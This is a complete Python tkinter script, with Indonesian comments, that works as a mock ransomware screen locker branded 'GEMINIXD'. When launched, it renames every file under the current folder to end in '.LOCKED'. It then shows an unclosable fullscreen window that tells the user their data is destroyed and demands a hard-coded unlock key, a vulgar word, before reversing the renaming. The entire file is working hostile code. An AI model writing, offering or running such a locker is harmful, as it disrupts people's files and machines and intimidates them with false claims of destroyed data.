import tkinter as tk
from tkinter import messagebox
import os

# --- CONFIG ---
SECRET_BACKDOOR = "puki"
TARGET_EXTENSION = ".LOCKED"
TARGET_DIR = "." # Folder yang mau "dikerjain"

def restore_logic():
    """Fungsi buat balikin nama file"""
    for root, dirs, files in os.walk(TARGET_DIR):
        for file in files:
            if file.endswith(TARGET_EXTENSION):
                old_path = os.path.join(root, file)
                new_path = old_path.replace(TARGET_EXTENSION, "")
                os.rename(old_path, new_path)

def lock_logic():
    """Fungsi buat ganti nama file jadi .LOCKED"""
    for root, dirs, files in os.walk(TARGET_DIR):
        for file in files:
            if file == os.path.basename(__file__) or file.endswith(TARGET_EXTENSION):
                continue
            old_path = os.path.join(root, file)
            new_path = old_path + TARGET_EXTENSION
            os.rename(old_path, new_path)

def check_password():
    if entry.get() == SECRET_BACKDOOR:
        restore_logic()
        messagebox.showinfo("GeminiXD", "System Restored! ✅")
        root.destroy() # Tutup jendela
    else:
        messagebox.showerror("Error", "KEY SALAH! Jangan ngasal! 💀")

# --- UI SETUP ---
# Jalankan penguncian nama file dulu
lock_logic()

root = tk.Tk()
root.title("SYSTEM CORRUPTED - 2108")
root.attributes("-fullscreen", True) # Biar nutupin layar HP
root.configure(bg='black')

# Label Judul
label = tk.Label(root, text="⚠️ SYSTEM LOCKED BY GEMINIXD ⚠️", 
                 fg="red", bg="black", font=("Helvetica", 20, "bold"))
label.pack(pady=50)

# Pesan Ancaman
msg = tk.Label(root, text="Dunia udah hancur, data lu juga ikut hancur.\nMasukkan kunci buat balikin!", 
               fg="white", bg="black", font=("Helvetica", 12))
msg.pack(pady=20)

# Input Password
entry = tk.Entry(root, show="*", font=("Helvetica", 15), justify='center')
entry.pack(pady=10)

# Tombol Unlock
btn = tk.Button(root, text="UNLOCK SYSTEM", command=check_password, 
                bg="red", fg="white", font=("Helvetica", 12, "bold"))
btn.pack(pady=20)

# Biar gak bisa di-close sembarangan lewat tombol back/exit
root.protocol("WM_DELETE_WINDOW", lambda: None)

root.mainloop()